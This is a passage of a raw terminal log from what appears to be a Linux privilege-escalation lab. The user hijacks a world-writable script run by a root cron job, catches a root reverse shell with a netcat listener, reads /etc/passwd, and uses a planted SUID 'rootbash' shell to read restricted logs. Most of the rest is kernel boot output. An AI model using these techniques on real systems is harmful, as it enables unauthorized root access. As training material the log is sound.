56852 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
569#
570* * * * * root overwrite.sh
571* * * * * root /usr/local/bin/compress.sh
572
573user@debian:~/tools/mysql-udf$ locate overwrite.sh
574locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 247.7 days)
575/usr/local/bin/overwrite.sh
576user@debian:~/tools/mysql-udf$ ls -l /usr/local/bin/overwrite.sh
577-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
578user@debian:~/tools/mysql-udf$ cd /usr/local/bin/
579user@debian:/usr/local/bin$ ls
580compress.sh overwrite.sh suid-env suid-env2 suid-so
581user@debian:/usr/local/bin$ cat overwrite.sh
582#!/bin/bash
583
584echo `date` > /tmp/useless
585user@debian:/usr/local/bin$ nano overwrite.sh
586user@debian:/usr/local/bin$ nc -nvlp 4444
587listening on [any] 4444 ...
588connect to [10.10.170.166] from (UNKNOWN) [10.10.170.166] 37728
589allexport off
590braceexpand on
591emacs on
592errexit off
593errtrace off
594functrace off
595hashall on
596histexpand on
597history on
598ignoreeof off
599interactive-comments on
600keyword off
601monitor off
602noclobber off
603noexec off
604noglob off
605nolog off
606notify off
607nounset off
608onecmd off
609physical off
610pipefail off
611posix off
612privileged off
613verbose off
614vi off
615xtrace off
616id
617uid=0(root) gid=0(root) groups=0(root)
618ls
619cat /etc/passwd
620root:x:0:0:root:/root:/bin/bash
621daemon:x:1:1:daemon:/usr/sbin:/bin/sh
622bin:x:2:2:bin:/bin:/bin/sh
623sys:x:3:3:sys:/dev:/bin/sh
624sync:x:4:65534:sync:/bin:/bin/sync
625games:x:5:60:games:/usr/games:/bin/sh
626man:x:6:12:man:/var/cache/man:/bin/sh
627lp:x:7:7:lp:/var/spool/lpd:/bin/sh
628mail:x:8:8:mail:/var/mail:/bin/sh
629news:x:9:9:news:/var/spool/news:/bin/sh
630uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
631proxy:x:13:13:proxy:/bin:/bin/sh
632www-data:x:33:33:www-data:/var/www:/bin/sh
633backup:x:34:34:backup:/var/backups:/bin/sh
634list:x:38:38:Mailing List Manager:/var/list:/bin/sh
635irc:x:39:39:ircd:/var/run/ircd:/bin/sh
636gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
637nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
638libuuid:x:100:101::/var/lib/libuuid:/bin/sh
639Debian-exim:x:101:103::/var/spool/exim4:/bin/false
640sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
641user:x:1000:1000:user,,,:/home/user:/bin/bash
642statd:x:103:65534::/var/lib/nfs:/bin/false
643mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
644bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
645user@debian:/usr/local/bin$
646
647login as: user
648user@10.10.170.166's password:
649Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
650
651The programs included with the Debian GNU/Linux system are free software;
652the exact distribution terms for each program are described in the
653individual files in /usr/share/doc/*/copyright.
654
655Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
656permitted by applicable law.
657Last login: Sun Jan 17 21:14:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
658user@debian:~$ dmesg | grep /var/log/messages > l33t.txt
659user@debian:~$ cat l33t.txt
660user@debian:~$ ls
661l33t.txt myvpn.ovpn tools
662user@debian:~$ cat l33t.txt
663user@debian:~$ ls
664l33t.txt myvpn.ovpn tools
665user@debian:~$ dmesg | grep /var/log/messages
666user@debian:~$ tail -f /var/log/messages
667tail: cannot open `/var/log/messages' for reading: Permission denied
668user@debian:~$ tail -f /var/log/messages | less
669user@debian:~$ tail -f /var/log/auth.log
670tail: cannot open `/var/log/auth.log' for reading: Permission denied
671user@debian:~$ /tmp/rootbash -p
672rootbash-4.1# tail -f /var/log/messages
673Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
674Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
675Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
676Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
677Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
678Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
679Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
680Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
681Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
682Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
683
684
685
686
687
688ls
689^C
690rootbash-4.1# cat /var/log/messages
691May 15 06:25:03 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1345" x-info="http://www.rsyslog.com"] rsyslogd was HUPed, type 'lightweight'.
692May 15 11:32:35 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
693May 15 11:32:35 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] (re)start
694May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
695May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
696May 15 11:32:35 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
697May 15 11:32:35 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
698May 15 11:32:35 debian kernel: [ 0.000000] KERNEL supported cpus:
699May 15 11:32:35 debian kernel: [ 0.000000] Intel GenuineIntel
700May 15 11:32:35 debian kernel: [ 0.000000] AMD AuthenticAMD
701May 15 11:32:35 debian kernel: [ 0.000000] Centaur CentaurHauls
702May 15 11:32:35 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
703May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
704May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
705May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
706May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 00000000f0000000 (usable)
707May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
708May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000100000000 - 00000003d0000000 (usable)
709May 15 11:32:35 debian kernel: [ 0.000000] DMI 2.7 present.
710May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0x3d0000 max_arch_pfn = 0x400000000
711May 15 11:32:35 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
712May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0xf0000 max_arch_pfn = 0x400000000
713May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-00000000f0000000
714May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000100000000-00000003d0000000
715May 15 11:32:35 debian kernel: [ 0.000000] RAMDISK: 37709000 - 37fefa59
716May 15 11:32:35 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
717May 15 11:32:35 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
718May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
719May 15 11:32:35 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
720May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
721May 15 11:32:35 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
722May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
723May 15 11:32:35 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
724May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
725May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
726May 15 11:32:35 debian kernel: [ 0.000000] No NUMA configuration found
727May 15 11:32:35 debian kernel: [ 0.000000] Faking a node at 0000000000000000-00000003d0000000
728May 15 11:32:35 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-00000003d0000000
729May 15 11:32:35 debian kernel: [ 0.000000] NODE_DATA [0000000000017000 - 000000000001efff]
730May 15 11:32:35 debian kernel: [ 0.000000] bootmap [000000000001f000 - 0000000000098fff] pages 7a
731May 15 11:32:35 debian kernel: [ 0.000000] (8 early reservations) ==> bootmem [0000000000 - 03d0000000]
732May 15 11:32:35 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
733May 15 11:32:35 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
734May 15 11:32:35 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
735May 15 11:32:35 debian kernel: [ 0.000000] #3 [0037709000 - 0037fefa59] RAMDISK ==> [0037709000 - 0037fefa59]
736May 15 11:32:35 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
737May 15 11:32:35 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
738May 15 11:32:35 debian kernel: [ 0.000000] #6 [0000008000 - 000000b000] PGTABLE ==> [0000008000 - 000000b000]
739May 15 11:32:35 debian kernel: [ 0.000000] #7 [000000b000 - 0000017000] PGTABLE ==> [000000b000 - 0000017000]
740May 15 11:32:35 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
741May 15 11:32:35 debian kernel: [ 0.000000] Zone PFN ranges:
742May 15 11:32:35 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
743May 15 11:32:35 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
744May 15 11:32:35 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x003d0000
745May 15 11:32:35 debian kernel: [ 0.000000] Movable zone start PFN for each node
746May 15 11:32:35 debian kernel: [ 0.000000] early_node_map[3] active PFN ranges
747May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
748May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x000f0000
749May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00100000 -> 0x003d0000
750May 15 11:32:35 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
751May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
752May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x02] enabled)
753May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
754May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled)
755May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
756May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
757May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
758May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
759May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
760May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
761May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
762May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
763May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
764May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
765May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
766May 15 11:32:35 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
767May 15 11:32:35 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
768May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
769May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
770May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
771May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
772May 15 11:32:35 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
773May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
774May 15 11:32:35 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 11 hotplug CPUs
775May 15 11:32:35 debian kernel: [ 0.000000] Xen version 4.2.
776May 15 11:32:35 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
777May 15 11:32:35 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
778May 15 11:32:35 debian kernel: [ 0.000000] You might have to change the root device
779May 15 11:32:35 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
780May 15 11:32:35 debian kernel: [ 0.000000] in your root= kernel command line option
781May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
782May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
783May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
784May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000f0000000 - 00000000fc000000
785May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000fc000000 - 0000000100000000
786May 15 11:32:35 debian kernel: [ 0.000000] Allocating PCI resources starting at f0000000 (gap: f0000000:c000000)
787May 15 11:32:35 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
788May 15 11:32:35 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
789May 15 11:32:35 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff88000ee00000 s90392 r8192 d24296 u131072
790May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
791May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
792May 15 11:32:35 debian kernel: [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 3877290
793May 15 11:32:35 debian kernel: [ 0.000000] Policy zone: Normal
794May 15 11:32:35 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
795May 15 11:32:35 debian kernel: [ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
796May 15 11:32:35 debian kernel: [ 0.000000] Initializing CPU#0
797May 15 11:32:35 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
798May 15 11:32:35 debian kernel: [ 0.000000] Checking aperture...
799May 15 11:32:35 debian kernel: [ 0.000000] No AGP bridge found
800May 15 11:32:35 debian kernel: [ 0.000000] PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
801May 15 11:32:35 debian kernel: [ 0.000000] Placing 64MB software IO TLB between ffff88000efde000 - ffff880012fde000
802May 15 11:32:35 debian kernel: [ 0.000000] software IO TLB at phys 0xefde000 - 0x12fde000
803May 15 11:32:35 debian kernel: [ 0.000000] Memory: 15426784k/15990784k available (3087k kernel code, 262536k absent, 301464k reserved, 2036k data, 592k init)
804May 15 11:32:35 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
805May 15 11:32:35 debian kernel: [ 0.000000] Hierarchical RCU implementation.
806May 15 11:32:35 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
807May 15 11:32:35 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
808May 15 11:32:35 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
809May 15 11:32:35 debian kernel: [ 0.000000] console [ttyS0] enabled
810May 15 11:32:35 debian kernel: [ 0.000000] Detected 2500.068 MHz processor.
811May 15 11:32:35 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 5000.13 BogoMIPS (lpj=10000272)
812May 15 11:32:35 debian kernel: [ 0.008000] Security Framework initialized
813May 15 11:32:35 debian kernel: [ 0.008000] SELinux: Disabled at boot.
814May 15 11:32:35 debian kernel: [ 0.008000] Dentry cache hash table entries: 2097152 (order: 12, 16777216 bytes)
815May 15 11:32:35 debian kernel: [ 0.008000] Inode-cache hash table entries: 1048576 (order: 11, 8388608 bytes)
816May 15 11:32:35 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
817May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys ns
818May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
819May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys devices
820May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
821May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
822May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
823May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
824May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
825May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
826May 15 11:32:35 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
827May 15 11:32:35 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
828May 15 11:32:35 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 62 no PMU driver, software events only.
829May 15 11:32:35 debian kernel: [ 0.009289] ACPI: Core revision 20090903
830May 15 11:32:35 debian kernel: [ 0.012133] Not enabling x2apic, Intr-remapping init failed.
831May 15 11:32:35 debian kernel: [ 0.012135] Setting APIC routing to physical flat
832May 15 11:32:35 debian kernel: [ 0.014214] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
833May 15 11:32:35 debian kernel: [ 0.053966] CPU0: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
834May 15 11:32:35 debian kernel: [ 0.053982] installing Xen timer for CPU 0
835May 15 11:32:35 debian kernel: [ 0.054162] Booting processor 1 APIC 0x2 ip 0x6000
836May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#1
837May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
838May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
839May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
840May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
841May 15 11:32:35 debian kernel: [ 0.008000] CPU 1/0x2 -> Node 0
842May 15 11:32:35 debian kernel: [ 0.140804] CPU1: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
843May 15 11:32:35 debian kernel: [ 0.140859] checking TSC synchronization [CPU#0 -> CPU#1]: passed.
844May 15 11:32:35 debian kernel: [ 0.144005] installing Xen timer for CPU 1
845May 15 11:32:35 debian kernel: [ 0.144084] Booting processor 2 APIC 0x1 ip 0x6000
846May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#2
847May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
848May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
849May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
850May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
851May 15 11:32:35 debian kernel: [ 0.008000] CPU 2/0x1 -> Node 0
852May 15 11:32:35 debian kernel: [ 0.232868] CPU2: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
853May 15 11:32:35 debian kernel: [ 0.232929] checking TSC synchronization [CPU#0 -> CPU#2]: passed.
854May 15 11:32:35 debian kernel: [ 0.236007] installing Xen timer for CPU 2
855May 15 11:32:35 debian kernel: [ 0.236108] Booting processor 3 APIC 0x3 ip 0x6000
856May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#3
857May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
858May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
859May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
860May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
861May 15 11:32:35 debian kernel: [ 0.008000] CPU 3/0x3 -> Node 0
862May 15 11:32:35 debian kernel: [ 0.324780] CPU3: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
863May 15 11:32:35 debian kernel: [ 0.324850] checking TSC synchronization [CPU#0 -> CPU#3]: passed.
864May 15 11:32:35 debian kernel: [ 0.328005] installing Xen timer for CPU 3
865May 15 11:32:35 debian kernel: [ 0.328025] Brought up 4 CPUs
866May 15 11:32:35 debian kernel: [ 0.328027] Total of 4 processors activated (20196.33 BogoMIPS).
867May 15 11:32:35 debian kernel: [ 0.328773] devtmpfs: initialized
868May 15 11:32:35 debian kernel: [ 0.332061] regulator: core version 0.5
869May 15 11:32:35 debian kernel: [ 0.332072] NET: Registered protocol family 16
870May 15 11:32:35 debian kernel: [ 0.332156] ACPI: bus type pci registered
871May 15 11:32:35 debian kernel: [ 0.332387] PCI: Using configuration type 1 for base access
872May 15 11:32:35 debian kernel: [ 0.332873] bio: create slab <bio-0> at 0
873May 15 11:32:35 debian kernel: [ 0.379117] ACPI: Interpreter enabled
874May 15 11:32:35 debian kernel: [ 0.379119] ACPI: (supports S0 S3 S4 S5)
875May 15 11:32:35 debian kernel: [ 0.379133] ACPI: Using IOAPIC for interrupt routing
876May 15 11:32:35 debian kernel: [ 0.457794] ACPI: No dock devices found.
877May 15 11:32:35 debian kernel: [ 0.457956] ACPI: PCI Root Bridge [PCI0] (0000:00)
878May 15 11:32:35 debian kernel: [ 0.462736] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
879May 15 11:32:35 debian kernel: [ 0.462737] * this clock source is slow. Consider trying other clock sources
880May 15 11:32:35 debian kernel: [ 0.463902] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
881May 15 11:32:35 debian kernel: [ 0.699319] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
882May 15 11:32:35 debian kernel: [ 0.699698] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
883May 15 11:32:35 debian kernel: [ 0.700019] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
884May 15 11:32:35 debian kernel: [ 0.700380] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
885May 15 11:32:35 debian kernel: [ 0.700653] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
886May 15 11:32:35 debian kernel: [ 0.700655] vgaarb: loaded
887May 15 11:32:35 debian kernel: [ 0.700693] PCI: Using ACPI for IRQ routing
888May 15 11:32:35 debian kernel: [ 0.700693] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
889May 15 11:32:35 debian kernel: [ 0.700693] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
890May 15 11:32:35 debian kernel: [ 0.700693] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
891May 15 11:32:35 debian kernel: [ 0.708028] Switching to clocksource xen
892May 15 11:32:35 debian kernel: [ 0.709101] pnp: PnP ACPI init
893May 15 11:32:35 debian kernel: [ 0.709113] ACPI: bus type pnp registered
894May 15 11:32:35 debian kernel: [ 0.747539] pnp: PnP ACPI: found 12 devices
895May 15 11:32:35 debian kernel: [ 0.747541] ACPI: ACPI bus type pnp unregistered
896May 15 11:32:35 debian kernel: [ 0.747551] system 00:00: iomem range 0x0-0x9ffff could not be reserved
897May 15 11:32:35 debian kernel: [ 0.747557] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
898May 15 11:32:35 debian kernel: [ 0.747558] system 00:03: ioport range 0xcc0-0xccf has been reserved
899May 15 11:32:35 debian kernel: [ 0.747560] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
900May 15 11:32:35 debian kernel: [ 0.747566] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
901May 15 11:32:35 debian kernel: [ 0.747568] system 00:0b: ioport range 0xb044-0xb047 has been reserved
902May 15 11:32:35 debian kernel: [ 0.752641] NET: Registered protocol family 2
903May 15 11:32:35 debian kernel: [ 0.752920] IP route cache hash table entries: 524288 (order: 10, 4194304 bytes)
904May 15 11:32:35 debian kernel: [ 0.754409] TCP established hash table entries: 524288 (order: 11, 8388608 bytes)
905May 15 11:32:35 debian kernel: [ 0.755645] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes)
906May 15 11:32:35 debian kernel: [ 0.755800] TCP: Hash tables configured (established 524288 bind 65536)
907May 15 11:32:35 debian kernel: [ 0.755801] TCP reno registered
908May 15 11:32:35 debian kernel: [ 0.755887] NET: Registered protocol family 1
909May 15 11:32:35 debian kernel: [ 0.755899] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
910May 15 11:32:35 debian kernel: [ 0.755960] pci 0000:00:01.0: PIIX3: Enabling Passive Release
911May 15 11:32:35 debian kernel: [ 0.756004] pci 0000:00:01.0: Activating ISA DMA hang workarounds
912May 15 11:32:35 debian kernel: [ 0.756087] Unpacking initramfs...
913May 15 11:32:35 debian kernel: [ 0.897823] Freeing initrd memory: 9114k freed
914May 15 11:32:35 debian kernel: [ 0.900160] audit: initializing netlink socket (disabled)
915May 15 11:32:35 debian kernel: [ 0.900169] type=2000 audit(1589556748.331:1): initialized
916May 15 11:32:35 debian kernel: [ 0.903195] HugeTLB registered 2 MB page size, pre-allocated 0 pages
917May 15 11:32:35 debian kernel: [ 0.904442] VFS: Disk quotas dquot_6.5.2
918May 15 11:32:35 debian kernel: [ 0.904488] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
919May 15 11:32:35 debian kernel: [ 0.904546] msgmni has been set to 30148
920May 15 11:32:35 debian kernel: [ 0.905183] alg: No test for stdrng (krng)
921May 15 11:32:35 debian kernel: [ 0.905239] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
922May 15 11:32:35 debian kernel: [ 0.905241] io scheduler noop registered
923May 15 11:32:35 debian kernel: [ 0.905242] io scheduler anticipatory registered
924May 15 11:32:35 debian kernel: [ 0.905243] io scheduler deadline registered
925May 15 11:32:35 debian kernel: [ 0.905276] io scheduler cfq registered (default)
926May 15 11:32:35 debian kernel: [ 0.905491] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
927May 15 11:32:35 debian kernel: [ 0.905526] Grant table initialized
928May 15 11:32:35 debian kernel: [ 0.907463] Linux agpgart interface v0.103
929May 15 11:32:35 debian kernel: [ 0.907481] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
930May 15 11:32:35 debian kernel: [ 0.908501] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
931May 15 11:32:35 debian kernel: [ 0.909962] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
932May 15 11:32:35 debian kernel: [ 0.910052] input: Macintosh mouse button emulation as /devices/virtual/input/input0
